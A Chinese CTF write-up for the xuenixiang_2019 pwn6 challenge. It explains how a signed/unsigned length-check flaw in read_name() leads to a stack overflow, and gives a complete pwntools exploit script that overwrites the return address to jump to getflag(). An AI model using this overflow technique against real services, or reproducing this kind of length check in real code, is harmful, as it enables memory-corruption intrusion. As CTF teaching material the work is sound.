
xuenixiang_2019_pwn_pwn6 wp by kone

思路:1. read_name() 的长度检查存在有符号/无符号混用漏洞:v2 声明为 unsigned int,检查时却被强转为 (signed int) 与 48 比较,而循环条件 i < v2 用的是无符号比较。输入 -1(即 0xffffffff)既能通过检查,又使循环几乎无上限地逐字节 read 进栈上缓冲区 s,造成栈溢出。
2. 构造 payload 覆盖 read_name() 的返回地址为 getflag();payload 末尾的换行符(sendline 自动添加)会命中 s == 10 的分支,让函数提前 return 到被改写的地址。


注意:
1. payload 在溢出过程中会依次覆盖 v2 和 i:v2 必须保持为 0xffffffff(否则 i < v2 提前不成立,循环结束),而写入 i 的那个字节会直接改变下一次 read 的下标,所以这两个位置要精确控制,否则后续字节的落点与预期不符。
2. 注意返回地址相对 s 的偏移:要按实际栈布局(s 之后的 v2、i 以及保存的寄存器/ebp)来确定,不要直接照搬偏移。

exp:
#-*- coding:utf-8 -*-
"""
// xuenixiang_2019_pwn_pwn6: https://www.xuenixiang.com/ctfexercise-competition-352.html

int __cdecl main(int argc, const char **argv, const char **envp)
{
int v4; //
unsigned int buf; //
int v6; //
int fd; //
int i; //

setvbuf(stdout, 0, 2, 0);
puts("###### Welecome to ctf game ######\ninput your name length : ");
read_name();
puts("let's begin guess num game ");
fd = open("/dev/urandom", 0);
if ( fd < 0 || read(fd, &buf, 4u) < 0 )
{
    puts("error");
    exit(0);
}
close(fd);
srand(buf);
for ( i = 0; i <= 9; ++i )
{
    v6 = rand() % 9 + 3;
    printf("Round %d , please guess the num : \n", i);
    fflush(stdout);
    fflush(stdin);
    __isoc99_scanf("%d", &v4);
    if ( v4 != v6 )
    {
      printf("you fail");
      exit(0);
    }
}
printf("u are great! this is your flag");
getflag();
return 0;
}

int read_name()
{
char s; //
unsigned int v2; //
unsigned int i; //

memset(s, 0, 0x50u);
__isoc99_scanf("%ld", &v2);
if ( (signed int)v2 > 48 )
{
    puts("too long!!! u are a hacker!!!");
    exit(0);
}
puts("please tell me your name : ");
fflush(stdout);
fflush(stdin);
for ( i = 0; i < v2; ++i )
{
    read(0, &s, 1u);
    if ( s == 10 )
    {
      s = 0;
      return printf("helllo %s\n", s);
    }
}
return printf("helllo %s\n", s);
}
"""

from pwn import *
import sys

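# Target is a 32-bit Linux binary; debug log level prints every byte sent/received.
context(arch="i386", os="linux", log_level="debug")

# Usage:
#   exp.py ./pwn6          -> run the binary locally
#   exp.py HOST PORT       -> connect to the remote challenge service
# Note: the original post lost the "[1]"/"[2]" subscripts (forum BBCode stripped
# them), so sys.argv was passed whole; index the arguments explicitly.
if len(sys.argv) == 2:
    p = process(sys.argv[1])
elif len(sys.argv) == 3:
    p = remote(sys.argv[1], int(sys.argv[2]))
else:
    print("Usage: exp.py [./a.out | 1.1.1.1 23456]")
    sys.exit(1)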

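# Step 1: the length check casts v2 to signed, so -1 (0xffffffff) passes
# "(signed int)v2 > 48" while the loop bound "i < v2" is unsigned -> unbounded read.
p.recvuntil(b"input your name length : \n")
p.sendline(b"-1")

p.recvuntil(b"please tell me your name : \n")

# Address of getflag() in the (non-PIE) challenge binary. If you have the
# binary locally, ELF('./pwn6').symbols['getflag'] gives the same value.
getflag_addr = 0x80486bb

# Build the payload as bytes: in Python 3 a str such as '\xff\xff\xff\xff' would be
# UTF-8 encoded by sendline and the 0xff bytes would arrive as 0xc3 0xbf.
payload = b"A" * 0x50            # fill the 0x50-byte name buffer s
payload += p32(0xffffffff)       # v2: keep the loop bound at "unlimited"
payload += p32(0x58)             # i: the byte landing in i's low byte becomes the
                                 # next write index; this value makes the remaining
                                 # bytes land on the saved registers / return slot.
                                 # Adjust if the stack layout differs (see note 2).
payload += b"B" * 8              # padding up to the saved return address
payload += p32(getflag_addr)     # overwrite read_name()'s return address
# sendline appends "\n", which hits the "s == 10" branch and returns early.
p.sendline(payload)

p.interactive()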

